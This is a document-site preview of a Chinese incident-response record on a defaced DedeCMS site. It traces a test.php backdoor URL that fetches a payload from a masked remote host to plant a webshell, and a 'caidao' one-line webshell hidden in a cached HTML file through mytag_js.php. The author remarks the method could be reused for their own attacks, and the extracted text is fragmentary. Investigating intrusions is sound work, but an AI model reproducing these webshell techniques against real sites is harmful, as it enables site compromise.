下载本文档
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
页面篡改应急事件记录事件简述某天,发现网站被百度提示页面部分已被非法篡改。如下从上可确认,网站确实存在页面篡改情况。排查过程106号通过对日志进行分析发现攻击者通过test.php写入optimized.php后门,写入时间为06/Oct/2019:13:01:36test.php写入时间为2019年10月6号test.php具体内容如下,可利用该后门通过访问如下链接//plus/test.php?id=http://xx.x.xx.xx:xxx/s/admine21.txt,生成optimized.php大马,访问optimized.php,输入密码可成功登录该木马程序,这也可做为我们日后攻击写马的方法test.php看到这个好兴奋呀,结果解码之后才发现不是test.php内容,解码内容如下moon.php404。接着又存在一条,看状态码是写入成功了解码内容如下从日志中可看到在写入成功后紧接着进行了一次访问mytag_js.php法判断文件的改动情况,只能利用现有资源翻目录看日志了。Data/cachemytag-511348.html2017年。打开该文件内容为含有php一句话菜刀马的html页面htmlhtml511348单独的htmlmytag_js.phpmytag_js.phpmytag_js.php进行404从之前的源码备份中找到了mytag_js.php,具体内容如下攻击者只需要访问http://x.x.x.x//plus/mytag_js.php?aid=511348,就可以连接一句话木马了,本地搭建环境测试了下确实可以利用菜刀连接上,从日志中也可以看到确实能连接成功,从数据包的大小,可看到攻击者利用该菜刀马做了一系列操作。此处攻击者巧妙的利用文件包含的方式隐藏后门,这确实是种不错的方法,一般很少有杀毒软件会对html的进行查杀。mytag-511348.html92912:35:5829/Sep/2019:11:08:3212/Jul/2019:09:40:01DedeCMSV57_UTF8_SP2©2004-2011版本,只能从日志中判断出是利用织梦的漏洞对系统实施攻击。data目录下tplcachephp本都可以追溯到17年,建议删除相关目录下后门程序、删除/plus/a
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 班级文化晚会的组织与策划计划
- 学校美术课堂专家讲座安排计划
- 开展主题阅读活动的建议计划
- 七年级必考名著《海底两万里》考点汇编及中考真题
- 远程管理与监督在跨区域康复中的运用
- 2024电动车控制器产品测试标准
- 班主任的自我提升之路计划
- 水利工程建设质量监管计划
- 足浴店成本控制与顾客体验提升
- 财务管理在公司战略中的作用计划
- 2025年慢性阻塞性肺疾病全球创议GOLD指南修订解读课件
- 初中语文现代文阅读训练及答案二十篇
- 2019安徽中考语文真题含答案
- 新生儿科出科考试试卷试题
- 信息化教学设计教案大学语文
- 氧气、二氧化碳、氩气安全周知卡
- 基层医疗卫生机构岗位设置指导意见
- FSC-COC培训学习
- 焊接线能量的计算公式
- 医用氧储罐检查记录表
- 植物的营养器官:根、茎、叶汇总
评论
0/150
提交评论